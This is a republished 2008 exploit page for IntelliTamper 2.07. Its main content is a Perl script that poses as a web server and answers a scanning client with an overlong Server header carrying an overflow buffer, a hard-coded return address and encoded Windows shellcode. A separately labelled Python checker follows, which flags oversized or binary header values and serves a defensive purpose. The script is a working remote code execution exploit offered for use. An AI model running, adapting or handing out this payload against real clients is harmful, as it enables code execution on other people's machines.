IntelliTamper 2.07 (server header) Remote Code Execution Exploit
Source: www.vfcocus.net  Author: Koshi  Published: 2008-07-23
#!/usr/bin/perl
#
# IntelliTamper 2.07 Remote Code Execution ( server header )
#
# By: Koshi
#
# Guido Landi finally did it, thought I'd throw one in there.
# This example assumes you're scanning "http://127.0.0.1"
# For example, the exploit may not work if you were to scan "http://127.0.0.1:80"
# or even if you change it as slightly as "http://127.0.0.1/"
#
# gr33tz: Rima my baby, str0ke, messiah, Idol, old venny  ;) , BU,
# and finally, Guido Landi for sparking my interest in exploiting
# this application.
#
#

use IO::Socket;

my $msg="";
my $overflow = "A"x1536;
my $fun = "".
"\xb3\x8d\x95\x7c". # EIP (0x7C958DB3      call esp NTDLL.DLL)
"z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0C". # More buffer.
"AAAA2Cb3Cb4CBBBB"; # Starts executing here


# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $sh3llcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63".
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x4b\x59\x59\x6c\x6a".
"\x48\x70\x44\x35\x50\x65\x50\x73\x30\x6e\x6b\x33\x75\x75\x6c\x4c".
"\x4b\x71\x6c\x53\x35\x74\x38\x55\x51\x78\x6f\x6e\x6b\x62\x6f\x36".
"\x78\x6c\x4b\x53\x6f\x65\x70\x36\x61\x6a\x4b\x43\x79\x6e\x6b\x76".
"\x54\x4e\x6b\x53\x31\x68\x6e\x64\x71\x6f\x30\x5a\x39\x4e\x4c\x6e".
"\x64\x6f\x30\x71\x64\x75\x57\x78\x41\x38\x4a\x74\x4d\x76\x61\x4f".
"\x32\x5a\x4b\x39\x64\x75\x6b\x43\x64\x67\x54\x74\x44\x74\x35\x48".
"\x65\x6c\x4b\x73\x6f\x37\x54\x57\x71\x38\x6b\x70\x66\x6e\x6b\x64".
"\x4c\x70\x4b\x4e\x6b\x33\x6f\x35\x4c\x64\x41\x38\x6b\x4c\x4b\x37".
"\x6c\x4c\x4b\x76\x61\x58\x6b\x6c\x49\x43\x6c\x55\x74\x56\x64\x4f".
"\x33\x44\x71\x4f\x30\x30\x64\x6c\x4b\x77\x30\x74\x70\x6f\x75\x49".
"\x50\x50\x78\x36\x6c\x4c\x4b\x33\x70\x54\x4c\x6e\x6b\x30\x70\x45".
"\x4c\x6e\x4d\x4c\x4b\x55\x38\x43\x38\x78\x6b\x44\x49\x6e\x6b\x4b".
"\x30\x6c\x70\x45\x50\x65\x50\x75\x50\x4c\x4b\x41\x78\x75\x6c\x51".
"\x4f\x30\x31\x7a\x56\x51\x70\x30\x56\x4f\x79\x38\x78\x6c\x43\x6b".
"\x70\x71\x6b\x72\x70\x61\x78\x4a\x50\x4d\x5a\x43\x34\x43\x6f\x43".
"\x58\x4c\x58\x49\x6e\x6c\x4a\x66\x6e\x43\x67\x69\x6f\x48\x67\x43".
"\x53\x73\x51\x50\x6c\x41\x73\x66\x4e\x70\x65\x72\x58\x71\x75\x37".
"\x70\x63";

my $overflow2 = "A"x1046;
my $buff = "$overflow$fun$sh3llcode";
my $resp = "".
"HTTP/1.1 200 OK\r\n".
"Connection: close\r\n".
"Content-Length: 8\r\n".
"Date: Mon, 21 Jul 2008 20:47:05 GMT\r\n".
"Content-Type: text/plain\r\n".
"Server: $buff\r\n".
"MIME-Version: 1.0\r\n\r\n".
"Exploit!\r\n";

my $sock = new IO::Socket::INET (LocalPort => '80', Proto => 'tcp', Listen => 1, Reuse => 1, );


print "Listening on port 80 for connections...\n";
my $new_sock = $sock->accept();
print "Got connection from client...\n";
my $sock_addr = recv($new_sock,$msg,190,0);
print "Sending client packet...\n";
print $new_sock "$resp";
print "Packet sent to client, voila?\n";
close($sock);
print "Socket closed\n";
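Added example, written here for the defender's side and not part of Koshi's script or the original page: a small Python checker that parses a raw HTTP/1.x response head and flags any header value that is implausibly long or carries non-printable bytes, which is exactly the shape of Server header the listener above hands to the client. The 256-byte per-value and 8 KB per-head limits are assumptions chosen for illustration, and the two sample responses are constructed, not captured traffic.

```python
"""Flag oversized or binary HTTP response header values.

Added example (not from the original page). Parses a raw response head and
reports header values that exceed an assumed length limit or contain
non-printable bytes. A client that copies a header into a fixed stack
buffer, as IntelliTamper 2.07 does with Server, is only reachable through
such a value, so this is a cheap proxy/IDS-side check.
"""

MAX_HEADER_VALUE = 256   # assumed sane upper bound for one header value
MAX_HEAD_BYTES = 8192    # assumed upper bound for the whole head block


def parse_head(raw: bytes):
    """Return (status_line, [(name, value), ...]) for a raw response.

    Values stay as bytes so binary content remains visible to the checks.
    Raises ValueError when the head has no CRLFCRLF terminator within
    MAX_HEAD_BYTES or when a header line has no colon.
    """
    end = raw.find(b"\r\n\r\n")
    if end == -1 or end > MAX_HEAD_BYTES:
        raise ValueError("response head missing terminator or too large")
    lines = raw[:end].split(b"\r\n")
    status = lines[0].decode("latin-1")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            raise ValueError(f"malformed header line: {line[:40]!r}")
        headers.append((name.strip().decode("latin-1").lower(), value.strip()))
    return status, headers


def check_headers(raw: bytes):
    """Return a list of (header_name, reason) findings; empty means benign."""
    findings = []
    try:
        _status, headers = parse_head(raw)
    except ValueError as exc:
        return [("<head>", str(exc))]
    for name, value in headers:
        if len(value) > MAX_HEADER_VALUE:
            findings.append(
                (name, f"value length {len(value)} exceeds {MAX_HEADER_VALUE}"))
        if any(b < 0x20 or b > 0x7E for b in value):
            findings.append((name, "value contains non-printable bytes"))
    return findings


# Constructed sample responses (not real captures).
BENIGN = (b"HTTP/1.1 200 OK\r\n"
          b"Server: Apache/2.2.9\r\n"
          b"Content-Type: text/html\r\n\r\n"
          b"<html></html>")

# Overlong Server value made of filler, followed by two control bytes.
SUSPICIOUS = (b"HTTP/1.1 200 OK\r\n"
              b"Server: " + b"A" * 2000 + b"\x01\x02\r\n"
              b"Content-Type: text/plain\r\n\r\n"
              b"x")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, check_headers(sample))
```

In a proxy or sensor the same function would run on the head of every response before it is forwarded; dropping or truncating the offending header is a simpler mitigation than patching every client that parses it.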

